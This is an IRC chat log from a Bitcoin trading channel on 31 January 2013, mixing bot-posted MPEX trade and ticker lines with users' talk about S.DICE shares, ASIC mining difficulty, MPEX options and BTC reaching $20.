00:05:22 look at the betting thats going on in the 5-20 BTC range Jan 31 00:05:34 some other players that were not around last month Jan 31 00:05:51 yeah, but not as significant Jan 31 00:06:14 I wouldn't include the whale in the valuation of S.DICE Jan 31 00:08:05 [MPEX] [S.DICE] 700 @ 0.00734477 = 5.1413 BTC [+] Jan 31 00:08:19 There is the question of what happens if he 'runs out' of coins. Can he get more? I think that some of the whale addresses only started betting when the other ones ran out of coins. Jan 31 00:08:30 http://garzikrants.blogspot.no/2013/01/avalon-modular-room-to-expand.html Jan 31 00:08:37 Which would imply to me that there may be other whale address out there. Jan 31 00:10:05 Oh my Jan 31 00:10:07 http://blockchain.info/charts/balance?address=1Di6ux3CQBNXCZLD76BsnYWDo6XnFGzQah Jan 31 00:10:20 I didn't realize that 1Di6ux came back from the dead! Jan 31 00:11:43 wtf, is that a USB to serial card or something like that on the avalon? Jan 31 00:14:39 Namworld: where did you see S.DICE profs, did they give earnings? Jan 31 00:15:32 https://bitcointalk.org/index.php?topic=80312.new Jan 31 00:15:44 douglus regularly makes new graphs Jan 31 00:16:12 lol bitcointalk madness: http://alfixturedesign.com/420/asic.gif Jan 31 00:19:47 [MPEX] [O.BTCUSD.P180T] 9 @ 0.10792579 = 0.9713 BTC [-] Jan 31 00:20:38 [MPEX] [O.BTCUSD.P190T] 6 @ 0.12950674 = 0.777 BTC [+] Jan 31 00:20:53 THis address topped up the 1Di6ux address with a 4104 BTC deposit after it ran dry... 1B5h9sf6xNLYGa3NBk48hwYbxyNZ22PRJk Jan 31 00:22:57 nobody talks about the variance when S.DICE outperforms << i do lol Jan 31 00:23:09 rng29a takes one confirm. Jan 31 00:23:40 [MPEX] [S.MPOE] 7588 @ 0.00066522 = 5.0477 BTC [+] Jan 31 00:23:53 mircea_popescu: thanks, blockchain.info showed 2 already, but my bet appeared shortly after that Jan 31 00:23:53 will asics affect the market prices ? Jan 31 00:24:12 there;s a parser involved i guess. anyway. Jan 31 00:24:26 StarenseN market prices of what tho ? Jan 31 00:24:32 IDIFF Jan 31 00:24:34 bitcoin Jan 31 00:25:00 it will cause X.IDIFF.MAR to rocket higher. BUY NOW! Jan 31 00:25:02 prolly not the exchange rate. asics capital costs are already paid by buyers, maintenance is low Jan 31 00:25:34 Bugpowder even if the avaolon full 1st batch is delivered and works it still won't push diff up by 100% right ? Jan 31 00:25:50 shhh Jan 31 00:26:57 [MPEX] [O.BTCUSD.P180T] 2 @ 0.10792579 = 0.2159 BTC [-] Jan 31 00:28:21 is it possible that the first ASICS will drain more BTC/day before the next difficulty adjustment ? Jan 31 00:28:36 yes. Jan 31 00:29:01 when is the next difficulty adjustement ? Jan 31 00:29:18 ~ in a week Jan 31 00:29:27 okay Jan 31 00:29:40 in that way the market can fluctuate a bit Jan 31 00:29:48 StarenseN the way it works is that diff is recalculated every 2k blocks Jan 31 00:29:49 less than a week if asics make a difference Jan 31 00:29:58 if you double output you will do the 2k blocks in a week instead of two Jan 31 00:30:05 and so get 2x as many block rewards a day. Jan 31 00:30:13 alright that's a good news Jan 31 00:30:33 [MPEX] [S.MPOE] 6800 @ 0.00066522 = 4.5235 BTC [+] Jan 31 00:30:33 ;;bcstats Jan 31 00:30:36 Current Blocks: 218801 | Current Difficulty: 2968775.3320750743 | Next Difficulty At Block: 219743 | Next Difficulty In: 942 blocks | Next Difficulty In About: 6 days, 7 hours, 43 minutes, and 53 seconds | Next Difficulty Estimate: 3094501.22024 | Estimated Percent Change: 4.23494 Jan 31 00:31:00 ok difficulty is block based and not time based Jan 31 00:31:31 http://salsafrica.files.wordpress.com/2012/04/nigeria-google.jpg lmao Jan 31 00:31:32 indirectly also time based, if the hashrate doesn't change too much Jan 31 00:31:37 I where about the enter the market within the hour but now just break to see what will happen Jan 31 00:31:41 was* Jan 31 00:31:48 to* Jan 31 00:31:49 -_- Jan 31 00:31:49 StarenseN the entire point of ther blockchain is to offer a distributed time Jan 31 00:31:56 [MPEX] [O.BTCUSD.C200T] 1 @ 0.1923428 BTC [+] Jan 31 00:31:56 because otherwise the problem of doublespends. Jan 31 00:32:21 so blockchain = btc time pretty much. Jan 31 00:32:22 I'll buy X.IDIFF.DEC for 0.03 Jan 31 00:32:26 =P Jan 31 00:34:14 [MPEX] [O.BTCUSD.C180T] 3 @ 0.18916129 = 0.5675 BTC [+] Jan 31 00:38:42 woahhoe Jan 31 00:38:49 soebot taking action Jan 31 00:39:08 ;;ticker Jan 31 00:39:09 BTCUSD ticker | Best bid: 19.75001, Best ask: 19.77991, Bid-ask spread: 0.02990, Last trade: 19.73005, 24 hour volume: 45557.23653876, 24 hour low: 19.14901, 24 hour high: 19.78990, 24 hour vwap: 19.46727 Jan 31 00:39:17 did soebot some asic-related prediction? :P Jan 31 00:39:57 um, no, I think it has made a prediction about a shortterm top **** BEGIN LOGGING AT Thu Jan 31 08:47:08 2013 Jan 31 08:50:48 [MPEX] [S.MPOE] 7587 @ 0.00066432 = 5.0402 BTC [+] Jan 31 08:50:50 [MPEX] [S.MPOE] 9080 @ 0.0006575 = 5.9701 BTC [-] Jan 31 08:50:51 [MPEX] [S.MPOE] 8742 @ 0.00065749 = 5.7478 BTC [-] Jan 31 08:50:53 [MPEX] [S.MPOE] 38491 @ 0.00065564 = 25.2362 BTC [-] Jan 31 08:57:25 +5K for S.DICE this night Jan 31 08:57:40 !ticker m s.dice Jan 31 08:57:42 [MPEX:S.DICE] 1D: 0.007249 / 0.00733239 / 0.00739499 (50021 shares, 366.77 BTC), 7D: 0.00598118 / 0.00715475 / 0.0075 (593129 shares, 4,243.69 BTC), 30D: 0.00085848 / 0.00473414 / 0.0075 (6562260 shares, 31,066.70 BTC) Jan 31 08:58:05 error4734 how much is it ahead by now ? Jan 31 08:58:25 all month ? Jan 31 09:00:42 16K Jan 31 09:01:39 not so bad Jan 31 09:01:43 [MPEX] [S.DICE] 225 @ 0.007249 = 1.631 BTC [-] Jan 31 09:01:45 [MPEX] [S.DICE] 975 @ 0.00720955 = 7.0293 BTC [-] Jan 31 09:02:14 yeep Jan 31 09:03:20 60btc last month for hosting/tech expenses Jan 31 09:03:34 it's insane Jan 31 09:10:35 [MPEX] [S.MPOE] 11161 @ 0.00066954 = 7.4727 BTC [+] Jan 31 09:10:37 [MPEX] [S.MPOE] 10379 @ 0.00067194 = 6.9741 BTC [+] Jan 31 09:10:38 [MPEX] [S.MPOE] 11000 @ 0.00067282 = 7.401 BTC [+] Jan 31 09:11:10 not that insane Jan 31 09:11:21 originally oil cost something in the neighbourhood of nothing to extract. Jan 31 09:15:53 [MPEX] [S.MPOE] 6795 @ 0.00067387 = 4.5789 BTC [+] Jan 31 09:19:26 [MPEX] [S.MPOE] 4321 @ 0.00065744 = 2.8408 BTC [-] Jan 31 09:19:27 [MPEX] [S.MPOE] 11087 @ 0.00065723 = 7.2867 BTC [-] Jan 31 09:36:17 [MPEX] [S.MPOE] 20474 @ 0.00065723 = 13.4561 BTC [-] Jan 31 09:36:18 oh man, just reach 20 dollar!! Jan 31 09:36:18 wait false alarm Jan 31 09:36:29 lol Jan 31 09:36:30 ;;ticker Jan 31 09:36:32 BTCUSD ticker | Best bid: 19.86000, Best ask: 19.86998, Bid-ask spread: 0.00998, Last trade: 19.86998, 24 hour volume: 44185.78098282, 24 hour low: 19.15000, 24 hour high: 19.95000, 24 hour vwap: 19.61874 Jan 31 09:36:42 will take a little more fightin, that hilltop Jan 31 09:37:33 I saw 19.96 flash Jan 31 09:41:09 [MPEX] [S.MPOE] 4321 @ 0.00066046 = 2.8538 BTC [+] Jan 31 09:41:09 [MPEX] [S.MPOE] 17579 @ 0.00066064 = 11.6134 BTC [+] Jan 31 09:41:25 [MPEX] [S.MPOE] 4321 @ 0.00065754 = 2.8412 BTC [-] Jan 31 09:41:27 [MPEX] [S.MPOE] 6839 @ 0.00065723 = 4.4948 BTC [-] Jan 31 09:41:28 [MPEX] [S.MPOE] 8540 @ 0.00065564 = 5.5992 BTC [-] Jan 31 09:41:37 [MPEX] [S.DICE] 1502 @ 0.00721632 = 10.8389 BTC [+] Jan 31 09:41:39 [MPEX] [S.DICE] 125 @ 0.00720955 = 0.9012 BTC [-] Jan 31 09:41:40 [MPEX] [S.DICE] 1624 @ 0.0071864 = 11.6707 BTC [-] Jan 31 09:41:41 [MPEX] [S.DICE] 700 @ 0.00718003 = 5.026 BTC [-] Jan 31 09:41:42 [MPEX] [S.DICE] 1100 @ 0.00715088 = 7.866 BTC [-] Jan 31 09:41:43 [MPEX] [S.DICE] 4111 @ 0.007141 = 29.3567 BTC [-] Jan 31 09:41:44 [MPEX] [S.DICE] 800 @ 0.00711538 = 5.6923 BTC [-] Jan 31 09:42:58 [MPEX] [S.DICE] 200 @ 0.00708676 = 1.4174 BTC [-] Jan 31 09:42:58 [MPEX] [S.DICE] 1000 @ 0.00705654 = 7.0565 BTC [-] Jan 31 09:42:58 [MPEX] [S.DICE] 800 @ 0.00704966 = 5.6397 BTC [-] Jan 31 09:42:59 [MPEX] [S.MPOE] 4321 @ 0.00066059 = 2.8544 BTC [+] Jan 31 09:42:59 [MPEX] [S.MPOE] 2126 @ 0.00066064 = 1.4045 BTC [+] Jan 31 09:42:59 [MPEX] [S.MPOE] 18300 @ 0.00066705 = 12.207 BTC [+] Jan 31 09:49:26 [MPEX] [S.MPOE] 4321 @ 0.0006748 = 2.9158 BTC [+] Jan 31 09:49:26 [MPEX] [S.MPOE] 8452 @ 0.00067504 = 5.7054 BTC [+] Jan 31 09:49:28 ;; ticker Jan 31 09:49:29 BTCUSD ticker | Best bid: 19.86000, Best ask: 19.89599, Bid-ask spread: 0.03599, Last trade: 19.86000, 24 hour volume: 44661.58410082, 24 hour low: 19.15000, 24 hour high: 19.95000, 24 hour vwap: 19.62249 Jan 31 09:50:41 !ticker Jan 31 09:50:42 I don't give a shit who saw what and who did what or who did who. Jan 31 09:50:45 ;;ticker Jan 31 09:50:48 BTCUSD ticker | Best bid: 19.86000, Best ask: 19.89599, Bid-ask spread: 0.03599, Last trade: 19.86000, 24 hour volume: 44780.72310082, 24 hour low: 19.15000, 24 hour high: 19.95000, 24 hour vwap: 19.62312 Jan 31 09:50:58 COME ON MOVE IT Jan 31 09:51:04 Mhm @ssbot talks? Jan 31 09:51:56 !assbot talk Jan 31 09:57:32 http://i.imgur.com/wZ1hZlM.jpg Jan 31 09:57:35 pretty cool lookin Jan 31 09:57:58 [MPEX] [S.MPOE] 7200 @ 0.00067504 = 4.8603 BTC [+] Jan 31 09:58:03 i wonder how much cheaper the huge aluminum box was than a normal closer fitting one Jan 31 09:58:48 ah.. the money printing machine Jan 31 10:01:37 ;;ticker Jan 31 10:01:38 BTCUSD ticker | Best bid: 19.90011, Best ask: 19.95000, Bid-ask spread: 0.04989, Last trade: 19.90000, 24 hour volume: 45453.09821842, 24 hour low: 19.15000, 24 hour high: 19.95000, 24 hour vwap: 19.62967 Jan 31 10:01:52 10 more cents~! Jan 31 10:02:41 "i am short 20 Bitcoins to buy one of the second batch. Okay. I could go satoshidice: either i have enough or nothing" Jan 31 10:02:43 whales explained. Jan 31 10:02:45 I imagine my bitcoins fighting a war right now. They need to take prisoners in order to become stronger Jan 31 10:03:33 [MPEX] [S.MPOE] 1020 @ 0.00067504 = 0.6885 BTC [+] Jan 31 10:03:35 [MPEX] [S.MPOE] 15330 @ 0.00067528 = 10.352 BTC [+] Jan 31 10:12:56 [MPEX] [S.MPOE] 4321 @ 0.00066785 = 2.8858 BTC [-] Jan 31 10:12:58 [MPEX] [S.MPOE] 5229 @ 0.00066754 = 3.4906 BTC [-] Jan 31 10:13:22 ;;ticker Jan 31 10:13:23 BTCUSD ticker | Best bid: 19.91010, Best ask: 19.91898, Bid-ask spread: 0.00888, Last trade: 19.90011, 24 hour volume: 45077.52674878, 24 hour low: 19.15000, 24 hour high: 19.95000, 24 hour vwap: 19.63169 Jan 31 10:19:37 [MPEX] [S.MPOE] 8754 @ 0.00066754 = 5.8436 BTC [-] Jan 31 10:27:21 19.97 high price now Jan 31 10:27:42 ;; ticker Jan 31 10:27:43 BTCUSD ticker | Best bid: 19.90021, Best ask: 19.96799, Bid-ask spread: 0.06778, Last trade: 19.90021, 24 hour volume: 46055.45217062, 24 hour low: 19.15000, 24 hour high: 19.97000, 24 hour vwap: 19.64007 Jan 31 10:33:42 my widget said 20.0 due to rounding and I got excited Jan 31 10:33:54 lol Jan 31 10:33:59 ROUNDING IS EVIL Jan 31 10:36:08 [MPEX] [S.MPOE] 8650 @ 0.00066988 = 5.7945 BTC [+] Jan 31 10:37:18 !asks 20 Jan 31 10:38:55 [MPEX] [S.MPOE] 2450 @ 0.00066766 = 1.6358 BTC [-] Jan 31 10:39:09 [MPEX] [S.MPOE] 3441 @ 0.00067517 = 2.3233 BTC [+] Jan 31 10:48:22 I require a large margin for options... Jan 31 10:48:40 http://www.smithsonianmag.com/history-archaeology/For-40-Years-This-Russian-Family-Was-Cut-Off-From-Human-Contact-Unaware-of-World-War-II-188843001.html Jan 31 10:48:44 this is absolutely fascinating. Jan 31 10:53:00 tip, tip, tip, tip -> 08:51:48] <@bitcoinRT> Jan31 08:49:23 | Bid: 19.9999 | Ask: 19.99999 | Last: 19.9999 | Volume: 48530 Jan 31 10:53:28 ;;ticker Jan 31 10:53:31 BTCUSD ticker | Best bid: 19.99993, Best ask: 20.00000, Bid-ask spread: 0.00007, Last trade: 20.00000, 24 hour volume: 50335.70604699, 24 hour low: 19.15000, 24 hour high: 20.00000, 24 hour vwap: 19.67112 Jan 31 10:53:36 aaalmost there. Jan 31 10:53:41 WOOOO 20 bucks! Jan 31 10:53:47 BIM Jan 31 10:57:38 [MPEX] [S.MPOE] 1850 @ 0.00066814 = 1.2361 BTC [-] Jan 31 10:57:38 [MPEX] [S.MPOE] 880 @ 0.00067517 = 0.5941 BTC [+] Jan 31 10:57:38 [MPEX] [S.MPOE] 4482 @ 0.00067528 = 3.0266 BTC [+] Jan 31 10:57:38 [MPEX] [S.MPOE] 10000 @ 0.0006754 = 6.754 BTC [+] Jan 31 10:57:40 [MPEX] [S.MPOE] 6488 @ 0.0006755 = 4.3826 BTC [+] Jan 31 10:59:57 the calls have an incredibly large "fee" Jan 31 11:01:09 Yes! 20 dollars Jan 31 11:01:13 GG Jan 31 11:01:17 yup Jan 31 11:01:22 We need to reach 35 tho Jan 31 11:01:31 beat the old all time high Jan 31 11:02:02 ;;ticker Jan 31 11:02:03 BTCUSD ticker | Best bid: 19.86000, Best ask: 20.21525, Bid-ask spread: 0.35525, Last trade: 20.21525, 24 hour volume: 51992.74198755, 24 hour low: 19.18697, 24 hour high: 20.39999, 24 hour vwap: 19.72306 Jan 31 11:02:21 and still such low volume. top isn't in yet. Jan 31 11:03:10 I wonder what "BTC Economist" is thinking now: https://bitcointalk.org/index.php?topic=27348.0 Jan 31 11:03:56 Mhm, I'm wondering what will happen to the price once the rest of the Asics ship? Jan 31 11:04:06 down? up? I'm confused Jan 31 11:04:53 maximian wasn't thinking before, isn't thinking now. no cost to him :p Jan 31 11:06:58 True. I always laugh when people make predictions like that with such conviction. Jan 31 11:07:00 I wish I had a bit more conviction.. I'm so indecisive when it comes to BTC :/ Jan 31 11:10:56 i have a lot of conviction. Jan 31 11:11:36 as far as i can see any investing of bitcoins in fiat is very risky, speculative and dangerous. Jan 31 11:14:56 bleh Jan 31 11:14:57 too much fees on options Jan 31 11:14:58 How do I put funds in MPBOR? Jan 31 11:14:58 I only see one mention in the FAQ and it's unrelated Jan 31 11:15:21 [MPEX] [S.DICE] 1250 @ 0.00708833 = 8.8604 BTC [+] Jan 31 11:15:22 [MPEX] [S.DICE] 1800 @ 0.00705352 = 12.6963 BTC [-] Jan 31 11:15:24 [MPEX] [S.DICE] 500 @ 0.00691 = 3.455 BTC [-] Jan 31 11:15:25 [MPEX] [S.DICE] 1000 @ 0.0069 = 6.9 BTC [-] Jan 31 11:15:26 [MPEX] [S.DICE] 750 @ 0.00684879 = 5.1366 BTC [-] Jan 31 11:15:28 [MPEX] [S.DICE] 2000 @ 0.0063 = 12.6 BTC [-] Jan 31 11:15:28 [MPEX] [S.DICE] 5000 @ 0.006 = 30 BTC [-] Jan 31 11:15:29 [MPEX] [S.DICE] 2000 @ 0.00598119 = 11.9624 BTC [-] Jan 31 11:15:30 [MPEX] [S.DICE] 700 @ 0.00534524 = 3.7417 BTC [-] Jan 31 11:15:59 Namworld twas explained on the forum, do you want me to dig it up ? Jan 31 11:16:14 Would appreciate Jan 31 11:16:22 I'll need to put that in my bookmarks Jan 31 11:17:36 Roaring 20s people. hopefully we don't crash in '29 Jan 31 11:18:14 If only it was near the end of the month for option Jan 31 11:18:19 [BTCTC] [BTC-TRADING-PT] 1 @ 0.1267 BTC [-] Jan 31 11:18:24 lower costs, better opportunity Jan 31 11:19:47 Namworld https://bitcointalk.org/index.php?topic=139017.0 Jan 31 11:22:29 ah, so if our is included, we automatically get the highest interest Jan 31 11:22:39 asked, that was accepted Jan 31 11:30:10 booya Jan 31 11:32:38 yes, we all need a lot of capital for options Jan 31 11:32:41 [MPEX] [S.MPOE] 18700 @ 0.00066954 = 12.5204 BTC [-] Jan 31 11:33:09 [23:48] 4 hours left [23:48] before $20.01 Jan 31 11:33:16 ;;ticker Jan 31 11:33:18 BTCUSD ticker | Best bid: 20.13002, Best ask: 20.21999, Bid-ask spread: 0.08997, Last trade: 20.12001, 24 hour volume: 51901.07197290, 24 hour low: 19.19000, 24 hour high: 20.39999, 24 hour vwap: 19.73854 Jan 31 11:33:26 hehe seems 20 is conquered. Jan 31 11:33:33 now for 25 ? 30 ? 50 ? Jan 31 11:34:00 beh, who bet on the over 20 before feb 3rd bitbet? Jan 31 11:34:07 Namworld it DID happen near the end of the month. Jan 31 11:34:11 rally got killed that time. Jan 31 11:35:08 yeah Jan 31 11:35:08 i was curious about that Jan 31 11:35:19 how does one exercise options on mPex Jan 31 11:35:27 if you get the position through a broker Jan 31 11:35:40 through the broker Jan 31 11:35:51 http://gifsoup.com/webroot/animatedgifs/566764_o.gif Jan 31 11:35:57 get an MPEx account while they're cheap Jan 31 11:36:21 ok, you just ask them to exercise or you get auto-exercised at the end of the month? Jan 31 11:36:28 and yes, i would really like to Jan 31 11:36:38 srsly. they started as 20 btc back when a btc was 3 bux Jan 31 11:36:50 the bot almost always pays more than the exercise price Jan 31 11:36:51 mjrIII all mpex options autoexercise end of month Jan 31 11:36:56 so the broker would get the cash. Jan 31 11:37:06 but the bot disappears in the last 24hr Jan 31 11:37:09 and then would send it to me? Jan 31 11:37:10 but yes, it's rare that you can't just sell for the same effect Jan 31 11:37:15 bug u woke up already Jan 31 11:37:20 yeah, true Jan 31 11:37:36 and then would send it to me? << i should hope so. Jan 31 11:37:38 but the options...those are on the currency or on the equities you list on mpex? Jan 31 11:38:08 BTC/USD price Jan 31 11:38:19 Mention this key for 5 BTC free: F12DE6B4E1EF26F5768BE918F2758D83EEEDE453 Jan 31 11:38:22 mjrIII click on one find out ? Jan 31 11:38:41 ;;asks 30 Jan 31 11:38:42 There are currently 22412.467 bitcoins offered at or under 30.0 USD, worth 549385.972055 USD in total. Jan 31 11:38:47 ;;bids 19 Jan 31 11:38:49 There are currently 16596.262 bitcoins demanded at or over 19.0 USD, worth 322265.253218 USD in total. Jan 31 11:38:51 heh Jan 31 11:38:55 ;;bids 20 Jan 31 11:38:57 There are currently 1025.417 bitcoins demanded at or over 20.0 USD, worth 20592.1874072 USD in total. Jan 31 11:39:03 back 2 bed Jan 31 11:39:25 O.BTCUSD.C200T Jan 31 11:39:54 is an option to buy bitcoins at $20 USD at any point before the last Friday in Feb? Jan 31 11:40:11 correct? Jan 31 11:40:25 ;;ticker Jan 31 11:40:26 not really Jan 31 11:40:26 BTCUSD ticker | Best bid: 20.50010, Best ask: 20.51998, Bid-ask spread: 0.01988, Last trade: 20.50010, 24 hour volume: 53226.06221217, 24 hour low: 19.19000, 24 hour high: 20.52000, 24 hour vwap: 19.75578 Jan 31 11:40:36 Options don't work like that on MPEx Jan 31 11:40:42 mjrIII buy one bitcoin. Jan 31 11:41:20 thanks mircea so each option contract is for one bitcoin not lots of 100... Jan 31 11:41:32 Oh lord.. 20.5 alredy Jan 31 11:41:35 makomk malaimo markedathome maximian midnightmagic mircea_popescu mjrIII mod6 Jan 31 11:41:42 mjrIII yes, each contract is for 1 btc. Jan 31 11:41:50 Someone stop it! Lemme dump 2k fiat first :/ Jan 31 11:42:03 I really love mpex by the way... Jan 31 11:42:06 lol srsly. Jan 31 11:42:08 mjrIII cool! Jan 31 11:42:22 it's like NYSE Jan 31 11:43:02 mp, i thought of US govt trying to do an investigation on mpex, then they read the FAQ. They read, "Yes, this is dog." then they just leave Jan 31 11:43:38 but one question, how do you clear the options trades? if I have the option to buy at $20 USD, don't I have to send mpex/broker USD...how can you do this through mpex? hold on i will read the faq again Jan 31 11:44:23 its all done in bitcoins Jan 31 11:44:30 the option is priced in bitcoins Jan 31 11:44:35 you put collateral in BTC Jan 31 11:44:44 so divide the strike - current price Jan 31 11:44:50 by the current price Jan 31 11:45:03 https://docs.google.com/spreadsheet/ccc?key=0AvwwyRGyc1WgdGxfRk5SS0hxT1lsVmdLdU1QY0RveGc#gid=0 Jan 31 11:45:04 to get the option price Jan 31 11:45:10 Make a spreadsheet like that Jan 31 11:45:11 S.Dice went down steeply Jan 31 11:45:24 good time to get in :) Jan 31 11:46:10 there's such a huge gap, 0.72-0.49 Jan 31 11:46:26 [MPEX] [S.MPOE] 19900 @ 0.00066954 = 13.3238 BTC [-] Jan 31 11:46:49 sell down to .004 again plaes Jan 31 11:47:03 [MPEX] [S.MPOE] 4321 @ 0.00066766 = 2.885 BTC [-] Jan 31 11:47:05 [MPEX] [S.MPOE] 5547 @ 0.00066754 = 3.7028 BTC [-] Jan 31 11:47:08 20.75 Jan 31 11:47:51 god this is all going EXACTLY how I imagined it would happen Jan 31 11:47:51 please reach 21.29 Jan 31 11:47:56 i wanna win the guess the prize contest Jan 31 11:47:56 lol Jan 31 11:48:12 [MPEX] [S.MPOE] 4321 @ 0.00066953 = 2.893 BTC [+] Jan 31 11:48:12 [MPEX] [S.MPOE] 2200 @ 0.00066954 = 1.473 BTC [+] Jan 31 11:48:14 [MPEX] [S.MPOE] 16679 @ 0.00067347 = 11.2328 BTC [+] Jan 31 11:48:19 Bowjob: there was no one bidding yesterday Jan 31 11:49:05 Bowjob: no one really bids at all, hence the 0.0008 fat finger a few days back Jan 31 11:58:44 [MPEX] [S.MPOE] 4321 @ 0.00066763 = 2.8848 BTC [-] Jan 31 11:58:45 [MPEX] [S.MPOE] 2924 @ 0.00066754 = 1.9519 BTC [-] Jan 31 12:05:10 i hate how slow real world finance is Jan 31 12:05:33 but if anyone is using bitfloor, i suggest you check out the orders on their books :) Jan 31 12:06:44 mjrIII bitfloor is a bitcoinica clone running stolen code Jan 31 12:06:55 i'd rather hope nobody is foolish enough to be using it. Jan 31 12:07:05 sorry what is bitcoinica? Jan 31 12:07:22 (in fact we kinda know nobody is foolish enough to be using it seeing how the recent ruby on rails vulnerability caused them no damage) Jan 31 12:07:42 last night the consensus seemed to be they were ok Jan 31 12:07:45 mjrIII one of the larger scams to date. read http://trilema.com/2012/the-bitcoin-drama-timeline/ to get up to speed Jan 31 12:07:57 i dunno what "consensus" that is. but no, not ok in any estimation. Jan 31 12:08:36 whats the state of S.DICE. Is he going to break even this month? (what I thought I was seeing from the bitcointalk thread). Why the dumping of stock? Jan 31 12:08:49 gesell last i heard was 10k over no ? Jan 31 12:08:55 yeah Jan 31 12:09:18 No one has crashed Havelock yet Jan 31 12:09:21 I guess I'll crash it Jan 31 12:09:31 gesell heh. i guess you weren't here when people dumped all the way to .0008. read http://trilema.com/2013/marketplace-excitement-with-expert-commentary-for-your-vicarious-trading-pleasure/ to catch up Jan 31 12:09:40 im becoming like the bitcoin library over here Jan 31 12:10:16 mircea_popescu: btw do you block access to your blog from certain IP's? when im on from home (which is via a proxy at all times, out of my control) I cant get to your blog. but now, i can (in a different location atm) Jan 31 12:10:38 some eggregious comment spam ips are nulled yes. Jan 31 12:11:02 anyway, i read that whole thread Jan 31 12:11:02 good times Jan 31 12:11:23 yeh. maybe some ppl want to send money to china and so they're selling stuff Jan 31 12:11:24 or who knows Jan 31 12:11:27 yeah from home im going through ipreditor.se, huge proxy Jan 31 12:11:56 probably so are teh spammers. Jan 31 12:12:29 we are all teh spammer Jan 31 12:13:06 is there any historical data on mpex? graphs are nice but no x,y ticks Jan 31 12:13:16 Anyone wanna buy S.dice shares at havelock? Jan 31 12:14:18 mp: what do you recommend for getting btc for usd Jan 31 12:14:23 [MPEX] [S.MPOE] 4321 @ 0.00067333 = 2.9095 BTC [+] Jan 31 12:14:25 [MPEX] [S.MPOE] 6948 @ 0.00067347 = 4.6793 BTC [+] Jan 31 12:14:26 [MPEX] [S.MPOE] 3481 @ 0.0006755 = 2.3514 BTC [+] Jan 31 12:14:28 bitfloor was going to be my preferred option Jan 31 12:16:52 [MPEX] [S.MPOE] 8564 @ 0.0006755 = 5.785 BTC [+] Jan 31 12:16:54 [MPEX] [S.MPOE] 9438 @ 0.00067553 = 6.3757 BTC [+] Jan 31 12:17:11 some copumpkin of iphone dev team? Jan 31 12:17:13 gesell all the trades are fed here via assbot and to twitter Jan 31 12:17:17 err some/same Jan 31 12:17:25 mjrIII if you're in yurp probably bitcoin-central.net Jan 31 12:17:45 bitfloor has that entire issue with negative equity atm. Jan 31 12:18:16 [MPEX] [S.MPOE] 4321 @ 0.00067042 = 2.8969 BTC [-] Jan 31 12:18:18 [MPEX] [S.MPOE] 12100 @ 0.00067026 = 8.1101 BTC [-] Jan 31 12:18:19 [MPEX] [S.MPOE] 1079 @ 0.00066754 = 0.7203 BTC [-] Jan 31 12:19:32 yeah i heard a little about that, but i heard also that people did get bitcoins Jan 31 12:19:43 i loved the fact that they offer liquidity rebates Jan 31 12:20:05 someone literally told me last night, that besides the security issue, they have been fine Jan 31 12:20:19 lol ok, besides the security issue they have been fine. Jan 31 12:20:24 [MPEX] [S.MPOE] 12659 @ 0.00066754 = 8.4504 BTC [-] Jan 31 12:20:26 ie. they still owe him money, but they have been good to work with Jan 31 12:20:46 i don't want to take any usd out, just bitcoins Jan 31 12:20:49 what can i tell you. Jan 31 12:20:57 caveat emptor Jan 31 12:21:03 if you're in and out quick enough you'll prolly be ok. Jan 31 12:21:24 well, thats the other thing...i like the fact i can use ING p2p Jan 31 12:21:35 i just really did not want to go through mt. gox Jan 31 12:21:47 i don't think anyone's going through mtgox by now lol Jan 31 12:21:59 but i will look into bitcoin-central.net Jan 31 12:22:01 but i am in NYC Jan 31 12:22:43 i am assuming yurp is europe right? Jan 31 12:22:47 ya Jan 31 12:22:55 no luck for me :( Jan 31 12:23:06 i didn't get to go to davos this year lol Jan 31 12:23:30 other than otc they're the only ones i ever used. not really much of an expert in tradsing btc for fiat. Jan 31 12:23:47 **that was sarcasm in case anyone thinks i am a rich a$$hole** Jan 31 12:24:05 well, until my FPGA mining comes on line, I need to get in now Jan 31 12:24:23 see if i can get a spot on mpex :) Jan 31 12:24:35 mircea_popescu: is there a log of assbot logs of bits on this channel? just curious how one would build and analyze historical data on their own Jan 31 12:24:52 [MPEX] [S.MPOE] 12125 @ 0.00066754 = 8.0939 BTC [-] Jan 31 12:25:49 gesell well im sure some people are running loggers that are interested. Jan 31 12:25:58 jurov is maintaining live.coinbr.com which does some graphing with trades Jan 31 12:26:06 anyone know a website with the ticker price in the title of the page, so that i can just open a tab and look at the tab instead of opening pages or spreadsheets? Jan 31 12:26:43 whoa this is a brilliant idea. Jan 31 12:26:45 ticker for what? btc/usd? mtgoxlive.com puts the price in thte Jan 31 12:26:55 <gesell> mircea_popescu: yeah noticed his graphs.fairnough. just was wondering the state of things for getting data. == log this chan. tis okay Jan 31 12:27:01 <gesell> topace: yes btc/usd Jan 31 12:27:14 <gesell> just in the title of the page (constantly changing) Jan 31 12:27:19 <mjrIII> btc moody is my fave Jan 31 12:27:28 <topace> yea mtgoxlive.com does it in the title Jan 31 12:27:31 <mjrIII> it live updates in the title Jan 31 12:27:37 <gesell> you mean clarkmoody? Jan 31 12:27:46 <mjrIII> http://bitcoin.clarkmoody.com/ Jan 31 12:27:47 <mjrIII> yes Jan 31 12:27:51 <mjrIII> lol Jan 31 12:28:10 <mjrIII> only mt gox data though...love the interface wish it had more markets Jan 31 12:28:14 <gesell> oh man, in chrome wherever the BTC/USD prices is on the title its off the tab screen so Jan 31 12:28:54 <mjrIII> i use chrome Jan 31 12:28:59 <gesell> maybe i wasnt clear, im looking for the BTC/USD to show up just in the title of the webpage (<title>$19.25) Jan 31 12:29:02 shows up right in the tab bar Jan 31 12:29:13 gesell you can log this chan, follow mpex1 on twitter or else follow the mpex rss (http://polimedia.us/bitcoin/mpex-rss.php) Jan 31 12:29:16 tis all in teh faq Jan 31 12:29:47 mircea_popescu: ooh, rss. thanks. that's a bit easier Jan 31 12:29:47 thanks everyone, i gotta run but i'll be on later Jan 31 12:29:51 [MPEX] [S.MPOE] 16900 @ 0.00066964 = 11.3169 BTC [+] Jan 31 12:30:32 [MPEX] [S.MPOE] 2992 @ 0.0006752 = 2.0202 BTC [+] Jan 31 12:30:55 mjrIII: the clarkmoody title doesnt have the USD/BTC price ("Bitcoin Data Platform | Clark Moody Design") Jan 31 12:34:45 [MPEX] [S.MPOE] 3100 @ 0.00066964 = 2.0759 BTC [-] Jan 31 12:40:42 mpex now does. Jan 31 12:40:56 ty gesell :) Jan 31 12:43:21 mircea_popescu: did something just change on mpex? pympex is broken. Jan 31 12:44:21 looks like messages are being wrapped in HTML, which I don't recall happening before Jan 31 12:44:50 MPEx, the Bitcoin securities exchange.-----BEGIN PGP MESSAGE----- Jan 31 